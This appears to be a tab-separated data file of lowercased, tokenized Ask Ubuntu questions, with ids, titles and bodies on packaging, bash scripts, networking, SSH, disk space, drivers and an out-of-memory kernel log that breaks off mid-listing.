161367	all special dependencies are lost when i do `` quickly share '' or `` quickly package ''	i am developing an app using quickly and it has a few dependencies like 'python-xdg ' for example . when i do quickly share on a computer that has ubuntu 12.04 without pre-released updates ( precise-proposed ) , those dependencies are well reflected in ./debian/control . but when i launch this command from an ubuntu 12.04 with pre-released updates ( precise-proposed ) , not only do i get a lot of warnings ( such as warning : syntax errors in myapp_lib/__init.py__.py : encoding declaration in unicode string ) , but also ./debian/control looses all sorts of special dependencies . what should i do to solve this problem ( preferably before the end of the ubuntu app showdown ) ? the same happens for quickly package .
161377	how can i discover the hostnames for all the machines on my lan ?	i ssh into the machines on my network using hostname.local . i 've forgotten the hostname for one of the machines . is there a command i can issue from one machine that will broadcast a request for and display all the hostnames for the machines on my lan ?
161378	how well does ubuntu run on the asus eee tablet ?	i 'm considering buying an asus eee transformer prime . i mainly want it so i can do some light web coding on the go . i commute a lot and most of my time is spent on the trains unfortunately . i know that it is possible to install ubuntu on the transformer prime . i 'm also aware that it is not stable since its something new . i 'm wondering if anyone has tried it , how responsive/ fast is it ? does the batter die quickly ?
161381	how do i solve this `` unexpected ' } ' syntax error '' in my bash script ?	i have a piece of code that has some serious issues and i was hoping to get it solved soon but no one has offered any help . i thought i 'd try some ubuntu users since this is the os running the script . mc_addplugin ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ! please stop the service before adding a plugin . '' else echo `` paste the url to the .jar plugin ... '' read jarurl jarname= $ ( basename `` $ jarurl '' ) if [ -d `` $ tempplugins '' ] then as_user `` cd $ pluginspath & & wget -r -a.jar $ jarurl -o temp_plugins/ $ jarname '' else as_user `` cd $ pluginspath & & mkdir $ tempplugins & & wget -r -a.jar $ jarurl -o temp_plugins/ $ jarname '' fi if [ -f `` $ tmpdir/ $ jarname '' ] then if [ -f `` $ pluginspath/ $ jarname '' ] then if `diff $ pluginspath/ $ jarname $ tmpdir/ $ jarname > /dev/null` then echo `` you are already running the latest version of $ jarname . '' else now=`date `` + % y- % m- % d_ % hh % m '' ` echo `` are you sure you want to overwrite this plugin ? [ y/n ] '' echo `` note : your old plugin will be moved to the `` $ tempplugins '' folder with todays date . '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname '' ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done fi else echo `` are you sure you want to add this new plugin ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname '' ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] ? '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done fi else echo `` failed to download the plugin from the url you specified ! '' exit ; fi } it throws it at the closing bracket at the end of the function .
161387	how do i install ubuntu server without a cd drive ?	i see no instructions for it and the iso file does n't work on a jump drive.. ?
161392	jslint/js formatter for kate	i recently switched from win7 and notepad++ to ubuntu and kate . everything seems ok , except that i am missing js lint and js format plugin of notepad++ on my kate . the docs are not that much helpful . can someone point me to the right direction if they are available . thanks ...
161394	could not update ubuntu 12.04	while i was trying to update ubuntu 12.04 i am repeatedly having problems showing the same error while updating . the error is as follows- e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-i386_packages , e : the package lists or status file could not be parsed or opened . is there any way to update the ubuntu ?
161396	why do i have a gnomekeyring.ioerror when doing `` quickly share '' ?	when i want to push my app to launchpad by doing quickly share -- verbose , i get the following gnome keyring error : get launchpad settings traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/share.py '' , line 101 , in < module > launchpad = launchpadaccess.initialize_lpi ( ) file `` /usr/lib/python2.7/dist-packages/quickly/launchpadaccess.py '' , line 91 , in initialize_lpi allow_access_levels= [ `` write_private '' ] ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 539 , in login_with credential_save_failed , version ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 342 , in _authorize_token_and_login authorization_engine.unique_consumer_id ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/credentials.py '' , line 282 , in load return self.do_load ( unique_key ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/credentials.py '' , line 336 , in do_load 'launchpadlib ' , unique_key ) file `` /usr/lib/python2.7/dist-packages/keyring/core.py '' , line 34 , in get_password return _keyring_backend.get_password ( service_name , username ) file `` /usr/lib/python2.7/dist-packages/keyring/backend.py '' , line 154 , in get_password items = gnomekeyring.find_network_password_sync ( username , service ) gnomekeyring.ioerror error : share command failed aborting this used to work , so this means that i already have sshâ and gpg configured . this is probably part of the explanation : i have this error when i am connected to this machine through a ssh tunnel with x forwarding . but i do n't have it when i have physical access to the computer . could you please give me some indications on what to do ?
161399	downloaded jdk 7 , but not jre 7 ?	so i 've downloaded jdk7 pretty much since the first day i started using ubuntu 12.04 so that i could start using eclipse under the most up-to-date version of java . i built and completed a project with the java 7 library , but when i tried to run its jar via the terminal , it said java 7 was not compatible . in the terminal , i ran java -version and it said i had jre6 . but how is that possible if i installed jdk7 ? should i install it separately ?
161402	installing ubuntu on 32bit xp system for the first time	should windows updates be completed before installing ubuntu ? should the anti-virus and/or the firewall be stopped while installing ? what is the exact procedure ?
161403	some questions before i install ubuntu from windows	i have windows 7 and wanting to switch to ubuntu . so ... . are skype , imvu and firefox available for ubuntu ? i do n't have a disc / usb . does that mean i can use windows installer to download ? what are requirements to install ? like ram etc .
161410	why wo n't my dual-boot system start after being shut down for a few days ?	i have windows7 & ubuntu , after several days in shudown position , my system is not booting now . i an not even getting grub for os selection . i have important data in hard disc how to restore & get important data ?
161414	can not use sudo command , changed permission of /usr folder	here 's how i messed up my ubuntu , i wanted to change file permissions of /usr folder and i did that by taking root privilege sudo -i i changed the file permission and logged back as my home user , but now i am not able to use sudo command . i tried to change the permissions back by using chown amd chmod command but that does not seem to work , i even tried running ubuntu live via pendrive but i do n't know how to get to the filesystem ( in which ubuntu is installed ) via terminal can anyone help me out here ? help me to get those permissions back to normal ?
161418	no permission to delete file , no space to have permission	my computer is nearly deadlocked . i have dedicated 200gig to ubuntu ( 11.10 ) and lately it has decided to tell me that there is 0bytes of space left . this is causing all sorts of problems . first of all : what is using up this 200gig ? ? ! ? ? ! i do n't download movies or anything and i only recently upgraded from my years of a 40gig hdd ( with far more apps ) so i ca n't even begin to imagine what could be taking up this much space . i tried to run a backup program ( photorec ) recently that has left lots of locked files on my computer that i can read , but ca n't delete . i have tried to `` sudo '' my way into deleting things but get the error : error copying '/home/ [ my usr ] /.xauthority ' to '/tmp/libgksu-w9v5iv ' : no space left on device [ usr ] @ [ my usr ] -system-product-name : ~ $ so basically i ca n't delete things because i do n't have the space to have the permission to delete things ? is that right ? i 'm very confused by all of this . also if someone has some idea of where to look for that extremely large 150gig+ of space being hogged i 'd really appreciate it . my `` home '' directory is 15gig in size . edit : i just realised one thing . i have n't used up all of my 200gig . the disk analyser thingy shows 100 % but it does n't mean 100 % of space used . this does beg the question , what is full and how do i `` unfull '' it ... ? ? ? ? ?
161420	disabling one-finger tap-to-click but keep two-finger tap ubuntu 12.04	the option to disable the touchpad while typing does not work on my samsung rc512 with an elantech touchpad and i enjoy two-finger scroll and middle-click emulation with two fingers too much to disable tapping the touchpad . when i type the cursor will jump around because i 'll hit the touchpad with my palm . how can i disable one-finger tapping but keep multi-finger tapping ?
161427	apt-cacher wo n't work : port 3142 blocked , how to open ?	after install ubuntu 12.04 in client pc . i try to setup apt-cache server in client pc . but , it does n't work in ubuntu client . err http : //136.xxx.xxx.x precise/multiverse sources 403 forbidden i try this step : step 1 : sudo apt-get install apt-cacher apache2 step 2 : sudo nano /etc/default/apt-cacher -- > already set autostart = 1 step 3 : sudo invoke-rc.d apache2 restart step 4 : open http : //server:3142/apt-cacher in browser http error 403 ( forbidden ) : the server refused to fulfill the request . here is my /etc/apt-cacher/apt-cacher.conf : http : //paste.ubuntu.com/1087474/ i try to open : wget -q -o- http : //www.google.com < title > error < /title > < body > < h1 > error < /h1 > fw-1 at jeinfw : access denied. < /body > ufw status status : inactive sudo iptables -l netstat -an | grep `` listen ``
161434	certain websites not opening in 12.04	i have just installed ubuntu 12.04 as a dual boot . i have an issue accessing certain websites such as google but no such problem in windows . what could be the problem ? the same issue exists in all browsers that i tried ( firefox , chrome , chromium ) please advice i have a dsl connection which i configured using the network manager .
161436	launchpad ppa supporting multiple versions of ubuntu	is it possible for a launchpad ppa to support multiple ubuntu versions such as 10.04 and 12.04 when the package itself was built on a 12.04 machine ? when trying to add the ppa to a older machine , it gives an error saying it was made on a 12.04 system and that it could not install . i 'd like sudo get-apt-install my-app to work with both 10.04 and 12.04 , and i am new to packaging and ppa 's so i do not know if anything like this exists . any help would be appreciated , thanks !
161437	when would yum be of use to an ubuntu user ?	my understanding is that yum , and the rpm system , is only useful on distributions such as red hat , fedora and centos . i thought that ubuntu , as a debian based system , had no use for yum . so i was surprised to find yum in the ( universe section of ) the official ubuntu repositories . when would yum be of use to an ubuntu user ?
161441	ubuntu windows installer - firewall	i installed ubuntu with the windows installer to use it along side . i could not find anything to activate a firewall so i thought its inbuilt and running . however now i read that i have to activate it manually ? the command that was shown actually did n't prompt any response . is it that the windows installer version does not have that . also my greatest concern is that i was without firewall protection for 2-3 weeks and i am using alot of public networks ( university and dorm ( only cable but still ) ) .
161442	can i use ls -r to show up to 2 folder depth ?	i have a folder tree that looks like this main/ main/34532-23423632-2354/what-i-want/sth/other/blah-blah main/54634-56345634-3422/what-i-want/sth/ ... . main/54356-34225675-2345/what-i-want/ i want it to show the tree up to the folder what i want . because the folders sth , other and so on contain many other things that are useless . i just want to see what 's inside each folder named xxxx-xxxxxxxx-xxxxx . is there any way ?
161443	list all available packages of a ppa without accessing the launchpad page ?	is there a way to list all available packages of a ppa , before installing of any packages ? i mean , is apt-cache able to tell this , or any other methology ?
161450	google chrome not rendering webpages correctly	i am facing some serious web page rendering issues with chrome . it is more prominent during javascript based animations and stuff on websites like youtube . i have tried removing chrome using ( sudo apt-get purge google-chrome-stable ) and then reinstalling it . but the problems still persist . the same webpages work correctly on firefox on ubuntu and chrome on windows . the problem only shows up when i use chrome on ubuntu . i think the issue has started after i updated to the latest version of chrome . i have used chrome previously on this machine without any problems . i have attached a image that demonstrates the issue . what could possibly be the problem ? ps : here 's the output of lshw -c video : *-display description : vga compatible controller product : madison [ radeon hd 5000m series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:46 memory : e0000000-efffffff memory : f0020000-f003ffff ioport : d000 ( size=256 ) memory : f0000000-f001ffff here 's the output of lspci -nn : output of lspci -nn
161454	`` pty allocation request failed '' error when trying to connect using ssh	i 'm trying to log into ubuntu desktop . i get the following error message : pty allocation request failed what does it mean and how to connect to my desktop ? this is the output with -v : debug1 : reading configuration data /home/evag/.ssh/config debug1 : /home/evag/.ssh/config line 1 : applying options for * debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : auto-mux : trying existing master debug1 : mux_client_request_session : master session id : 2 pty allocation request failed given the output presented above with the verbose option , i think i understand where the problem comes from : i have two computers , a and b. i 'm using a controlmaster in a to keep persistent connections to b . a logs into b in a safe way , with command=/bin/false to limit the usage a has on b ( it has only forwarding capabilities ) . however i would want to connect to ssh from a to b without using this identity ( -i ) , but the problem is that since there is a persistent connection , it uses the existing connection regardless of the option i put in -i , so i end up with not being able to allocate a pty . so given that there is an existing controlmaster and protected connection from a to b , how can i get another connection from a to b , but this time with full rights ?
161459	documents stored on separate internal drive , ubuntu does n't notice on startup	my machine has windows 7 ultimate x64 and ubuntu 12.04 lts running side-by-side on a single hard drive with grub bootloader , each with 500 gb storage . i keep my personal documents on a separate 1tb hard drive so they remain isolated from any changes i make to the os drive , but when ubuntu starts it does not seem to notice my documents drive . while i 've installed and worked with ubuntu 12.04 server x32 before , using it as a desktop os is new to me . i use my documents drive for all of my personal data , including wallpapers and music , so it is imperative that ubuntu recognize it on startup . concerning the two specific examples : ubuntu loads with the default blue-colored desktop instead of my desired picture of the spectacular carina galaxy . when i right-click the desktop and select `` change desktop background '' , it wakes up from its amnesia and loads the proper background . as for my music , rhythmbox defaults to an empty library upon reboot , forcing me to reload the settings manually each time . this gets quite tedious because i certainly ca n't work to my full potential without my music . the second thing i would like to address is making ubuntu point the documents directories in ~ to their appropriate counterparts on the 1tb documents drive . i realize that this question is not new , but when i create the symbolical links , they established themselves inside the directories and did not convert the directories themselves into symbolical links . i also prefer not to move the files themselves from their current location on the 1tb drive . i believe this would also help the rhythmbox library problem as well considering it 's a default directory for the music player . excerpt from fstab : proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb6 during installation uuid=057ac83e-76ad-460d-86e5-b6d46e9b1d80 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb7 during installation # uuid=1183df90-23fc-44e4-aa17-4e7c9865d5cb none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 that 's enough content for one question . i really like the ubuntu experience so far since it does n't treat me like an idiot out of the box ( ca n't say the same for windows ) so i ca n't wait to hear from the community ! thanks for your help in advance .
161463	ctrl + c does n't abort programs in terminal	i changed the keyboard shortcut in terminal so that ctrl + c would copy text . i realized i ca n't abort a program i am running since ctrl + c used to be the abort command . i know that ctrl + shift + c works but want it switched back . is there a way to revert the keyboard shortcuts to the real defaults before i decided to mess with it ? what is the abort command defined as in keyboard shortcuts ? not a big program if i ca n't but it would be nice to know .
161470	command to delete all files from folders matching name recursivly ?	i have my base folder ( let 's call it base ) . i have a bunch of folders inside , scattered at various depths within these folders are cache folders . i want to delete all files from within the cache folders , but not the folders themselves . i have tried cd base # then one of ... sudo rm -rf cache/* sudo rm -rf *cache/* sudo rm -rf cache*/* sudo rm -rf *cache*/* but really am just guessing , what would be the right command ?
161473	how can i replicate the liveusb boot-experience using grub2 ?	as far as i know , ubuntu live usb versions use syslinux as bootloader whereas , when installed , the default is grub2 . this makes replicating the boot experience a bit more involved than just copying the config files . liveusb boot-experience : 1 . it appears a splash image , purple with a symbol on the lower side of the screen , which shows you how to intervene in the boot process 2a . if you do n't press any key on the keyboard in like 15s , the bootloader goes on booting the default session 2b . if you press any key you are shown a menu where you could `` tweak '' the boot process ( set language , what to boot , etc . ) grub2 default boot-experience with multiple oss : 1 . it appears a menu with all the bootable images 2a . if you do n't press any key on the keyboard in 10s , the bootloader goes on booting the default session 2b . if you press any key you can actually choose which image to boot what i 'd like to do is hiding the grub menu to show a splash image identical to the live one and then , if i press a key , to be presented the full menu . obviously i do n't like to extend the boot time so the splash image timeout would be the only one to wait to and on the other hand when the menu is shown ( which would happen only if i press a key ) the timeout would be futile , 'cause i 'm already in front of the computer to select the image i want to boot . hope to have been clear enough . i already tried editing /etc/default/grub , toying with grub_hidden_timeout , grub_timeout and splash images but i had no luck . yes , i used update-grub after every edit ; ) edit : i looked deeper in the internet and i found there are several problems involved : 1 . hidden menu does n't work as expected when using multiple oss 2 . the splash screen does n't always show up immediately useful resources i found so far : commmunity help wiki ubuntu forums thread
161475	how to change primary partition to extended without formatting	i have 4 primary partitions already , and i want to make a partition for installing ubuntu , but i get the error that there ca n't be more than 4 primary partitions , is there a way that i can put two of the existing partitions inside an extended partition , without loosing any data ? edit : all the partitions are ntfs .
161477	software center and update stopped working 11.10	suddenly software center and update have stopped working ( update is not working either ) . in a terminal , i tried : demian @ dimbo-tp : ~ $ software-center traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 149 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 26 , in < module > import dbus file `` /usr/lib/python2.7/dist-packages/dbus/__init__.py '' , line 100 , in < module > importerror : can not import name bus demian @ dimbo-tp : ~ $ sudo apt-get install -- reinstall software-center [ sudo ] password for demian : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 163 not upgraded . need to get 0 b/697 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 279773 files and directories currently installed . ) preparing to replace software-center 5.0.6 ( using ... /software-center_5.0.6_all.deb ) ... unpacking replacement software-center ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... setting up software-center ( 5.0.6 ) ... warning : root : failure to import : ' can not import name bus' traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 62 , in < module > class updatesoftwarecenterdbus ( dbus.service.object ) : nameerror : name 'dbus ' is not defined any ideas ?
161482	wired connection not working ubuntu 12.04	my connection was fine until now , but my wired connection is not working in ubuntu 12.04 . i have installed ubuntu 12.04 along side windows 7 partition and the connection works on windows but not on ubuntu 12.04 . i have no problem with wireless connection as well . the problem is specific to the wired connection on ubuntu 12.04 . i have included a few details below . ifconfig eth0 link encap : ethernet hwaddr 00:1e : ec:8d : f0:03 inet6 addr : fe80 : :21e : ecff : fe8d : f003/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1 errors:0 dropped:0 overruns:0 frame:0 tx packets:376 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:316 ( 316.0 b ) tx bytes:33769 ( 33.7 kb ) interrupt:19 eth2 link encap : ethernet hwaddr 00:21:00:4e : ac:58 inet6 addr : fe80 : :221 : ff : fe4e : ac58/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:1660 errors:0 dropped:0 overruns:0 frame:28 tx packets:1846 errors:61 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1372676 ( 1.3 mb ) tx bytes:254576 ( 254.5 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1862 errors:0 dropped:0 overruns:0 frame:0 tx packets:1862 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:155767 ( 155.7 kb ) tx bytes:155767 ( 155.7 kb ) sudo lshw -c network *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth2 version : 01 serial : 00:21:00:4e : ac:58 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=10.0.0.3 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:18 memory:99700000-99703fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 02 serial : 00:1e : ec:8d : f0:03 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:19 ioport:3000 ( size=256 ) memory:93410000-93410fff memory:93400000-9340ffff memory:93420000-9343ffff
161484	getting the program `` repo '' ?	i 'm trying to follow the instructions at http : //developer.mips.com/android/android-source-code/ to install an android development environment on my ubuntu 12 but i 'm missing the program repo could you tell me how i get it enabled ? $ repo init -u git : //github.com/mips/manifests.git -b mips-ics-mr1.1 -m mips-ics-4.0.4_r1.1m4.xml no command 'repo ' found , did you mean : command 'rep ' from package 'rep ' ( universe ) command 'repl ' from package 'nmh ' ( universe ) command 'repl ' from package 'mailutils-mh ' ( universe ) repo : command not found dev @ dev-optiplex-745 : ~/mipsandroid $ sudo apt-get install repo läser paketlistor ... färdig bygger beroendeträd läser tillståndsinformation ... färdig e : kunde inte hitta paketet repo dev @ dev-optiplex-745 : ~/mipsandroid $
161489	squid3 blacklist	i configure squid like this , but the blacklist does n't work . i look for something in the web , but nothing . # squid squid.conf http_port 8080 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # database authentication mysql auth_param basic program /usr/lib/squid3/squid_db_auth -- dsn `` dbi : mysql : database=something `` -- user something -- password something -- plaintext -- persist auth_param basic children 5 auth_param basic realm web-proxy auth_param basic credentialsttl 30 minute auth_param basic casesensitive off acl db-auth proxy_auth required http_access allow db-auth # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # acl acl manager proto cache_object acl localhost src 127.0.0.1/32 : :1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 : :1 acl ssl_ports port 443 acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect acl blacklist dstdom_regex -i `` /etc/squid3/blacklist '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # lista operazioni acl http_access deny blacklist http_access allow manager localhost http_access deny manager http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access deny all # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # coredump_dir /var/spool/squid3 the blacklist is like this : facebook.it facebook.com
161497	connecting to a shared internet connection in virtualbox	i have managed to set up my iphone as a wireless network adapter within my windows 7 virtual machine which is running within ubuntu . is there a way for ubuntu to use the shared internet connection from the virtualbox machine ? in order to clarify : [ internet ] -- [ router ] -wireless- [ iphone ] -usb- [ virtual machine inside ubuntu ] i ca n't access the internet provided by the iphone in ubuntu directily because the os needs to have a modem driver installed in order to connect with the iphone . so the obvious solution to me would be to use ics in windows ( aka the virtual machine ) to share the internet with the parent os ( ubuntu in this cawse ) . is this possible ? if so , how would i go about connecting to the shared connection ? thanks in advance : )
161503	can i install portage , pacman or other package managers on ubuntu ?	i want to install a non-ubuntu package manager like portage ( gentoo ) or pacman ( arch ) on ubuntu 12.04 lts . how do i do that ? ? ps - i 'm a newbie to linux .
161505	install webcam driver ( genius facecam 300 )	i want to install the genius facecam 300 driver on ubuntu 12.04 64bit . i saw this website that seems to be useful : http : //patchwork.linuxtv.org/patch/11269/ ; but i do not know how should i use it exactly . bus 004 device 002 : id 093a:2627 pixart imaging , inc. how can i install that driver ?
161510	ubuntu installed alongside an infected windows system	my antivirus scan has found something on windows 7 . no information yet what it is . however i was thinking of installing ubuntu alongside windows . could that be dangerous in terms of ubuntu catching anything malicious on the windows system ?
161511	are the linux utilities parts of the kernel/shell ?	such as cp , ls , grep , ps ... are they stand-alone applications pre-installed on the operating system or the innate part of the operating system ?
161515	speech-recognition app to convert mp3 to text ?	does any one know of an application that can convert audio to text ? i 'm running ubuntu 12.04 lts .
161521	why does my server freeze everyday at the same time ?	my server freezes every day at 00:50 am . i do not know what it can be . in log files i found just such a suspect listing , but i do not know what that means . could someone help me ? ? kernel : php5-cgi invoked oom-killer : gfp_mask=0x84d0 , order=0 , oom_adj=0 , oom_score_adj=0 kernel : php5-cgi cpuset=/ mems_allowed=0 kernel : pid : 20316 , comm : php5-cgi not tainted 2.6.38.2-xxxx-std-ipv6-64 # 2 kernel : call trace : kernel : [ < ffffffff810de9e8 > ] ? dump_header+0x88/0x1d0 kernel : [ < ffffffff810aa6e3 > ] ? ktime_get_ts+0xb3/0xe0 kernel : [ < ffffffff810de931 > ] ? oom_unkillable_task+0x91/0xc0 kernel : [ < ffffffff8150c7e5 > ] ? ___ratelimit+0xa5/0x120 kernel : [ < ffffffff810def0c > ] ? oom_kill_process+0x8c/0x2e0 kernel : [ < ffffffff810dedd3 > ] ? select_bad_process+0x93/0x140 kernel : [ < ffffffff810df398 > ] ? out_of_memory+0x238/0x3e0 kernel : [ < ffffffff810e45bd > ] ? __alloc_pages_nodemask+0x86d/0x8a0 kernel : [ < ffffffff8110ff4a > ] ? alloc_pages_current+0xaa/0x120 kernel : [ < ffffffff81069d46 > ] ? pte_alloc_one+0x16/0x40 kernel : [ < ffffffff810fa159 > ] ? __pte_alloc+0x29/0xd0 kernel : [ < ffffffff810fa363 > ] ? handle_mm_fault+0x163/0x200 kernel : [ < ffffffff81066077 > ] ? do_page_fault+0x197/0x410 kernel : [ < ffffffff81100556 > ] ? do_brk+0x286/0x390 kernel : [ < ffffffff81a7419f > ] ? page_fault+0x1f/0x30 kernel : mem-info : kernel : node 0 dma per-cpu : kernel : cpu 0 : hi : 0 , btch : 1 usd : 0 kernel : node 0 dma32 per-cpu : kernel : cpu 0 : hi : 186 , btch : 31 usd : 156 kernel : active_anon:468626 inactive_anon:383 isolated_anon:0 kernel : active_file:66 inactive_file:101 isolated_file:64 kernel : unevictable:0 dirty:0 writeback:0 unstable:0 kernel : free:3426 slab_reclaimable:1691 slab_unreclaimable:13557 kernel : mapped:380 shmem:404 pagetables:10150 bounce:0 kernel : node 0 dma free:7932kb min:44kb low:52kb high:64kb active_anon:7056kb inactive_anon:0kb active_file:0kb inactive_file:0kb unevictable:0kb isolated ( anon ) :0kb isolated ( file ) :0kb present:15684kb mlocked:0kb dirty:0kb writeback:0kb mapped:0kb shmem:0kb slab_reclaimable:0kb slab_unreclaimable:388kb kernel_stack:16kb pagetables:488kb unstable:0kb bounce:0kb writeback_tmp:0kb pages_scanned:0 all_unreclaimable ? no kernel : lowmem_reserve [ ] : 0 1967 1967 1967 kernel : node 0 dma32 free:5772kb min:5648kb low:7060kb high:8472kb active_anon:1867448kb inactive_anon:1532kb active_file:264kb inactive_file:404kb unevictable:0kb isolated ( anon ) :0kb isolated ( file ) :256kb present:2014316kb mlocked:0kb dirty:0kb writeback:0kb mapped:1520kb shmem:1616kb slab_reclaimable:6764kb slab_unreclaimable:53840kb kernel_stack:1912kb pagetables:40112kb unstable:0kb bounce:0kb writeback_tmp:0kb pages_scanned:1423 all_unreclaimable ? no kernel : lowmem_reserve [ ] : 0 0 0 0 kernel : node 0 dma : 45*4kb 56*8kb 29*16kb 8*32kb 7*64kb 4*128kb 2*256kb 0*512kb 1*1024kb 0*2048kb 1*4096kb = 7940kb kernel : node 0 dma32 : 149*4kb 1*8kb 1*16kb 1*32kb 0*64kb 0*128kb 0*256kb 0*512kb 1*1024kb 0*2048kb 1*4096kb = 5772kb kernel : 646 total pagecache pages kernel : 0 pages in swap cache kernel : swap cache stats : add 0 , delete 0 , find 0/0 kernel : free swap = 0kb kernel : total swap = 0kb kernel : 515824 pages ram kernel : 12393 pages reserved kernel : 310091 pages shared kernel : 436769 pages non-shared kernel : [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name kernel : [ 1562 ] 0 1562 4238 40 0 0 0 upstart-udev-br kernel : [ 1564 ] 0 1564 4230 74 0 -17 -1000 udevd kernel : [ 1656 ] 0 1656 4229 75 0 -17 -1000 udevd kernel : [ 1661 ] 0 1661 4229 73 0 -17 -1000 udevd kernel : [ 2620 ] 0 2620 12328 141 0 -17 -1000 sshd kernel : [ 2631 ] 101 2631 13713 221 0 0 0 rsyslogd kernel : [ 2648 ] 0 2648 1532 30 0 0 0 getty kernel : [ 2652 ] 0 2652 1532 29 0 0 0 getty kernel : [ 2655 ] 0 2655 1532 29 0 0 0 getty kernel : [ 2656 ] 0 2656 1532 29 0 0 0 getty kernel : [ 2659 ] 0 2659 1532 30 0 0 0 getty kernel : [ 2666 ] 0 2666 5281 65 0 0 0 cron kernel : [ 2701 ] 102 2701 32660 5339 0 0 0 named kernel : [ 2708 ] 104 2708 63627 11103 0 0 0 mysqld kernel : [ 2723 ] 0 2723 3482 38 0 0 0 couriertcpd kernel : [ 2725 ] 0 2725 980 17 0 0 0 courierlogger kernel : [ 2735 ] 0 2735 3482 38 0 0 0 couriertcpd kernel : [ 2737 ] 0 2737 980 17 0 0 0 courierlogger kernel : [ 2744 ] 0 2744 3482 41 0 0 0 couriertcpd kernel : [ 2747 ] 0 2747 1013 26 0 0 0 courierlogger kernel : [ 2754 ] 0 2754 3482 38 0 0 0 couriertcpd kernel : [ 2757 ] 0 2757 980 18 0 0 0 courierlogger kernel : [ 3313 ] 65534 3313 15729 79 0 0 0 memcached kernel : [ 3383 ] 1002 3383 12937 1590 0 0 0 sw-cp-serverd kernel : [ 3393 ] 0 3393 4894 58 0 0 0 xinetd kernel : [ 3535 ] 2522 3535 1027 28 0 0 0 qmail-send kernel : [ 3536 ] 2022 3536 1015 26 0 0 0 splogger kernel : [ 3537 ] 0 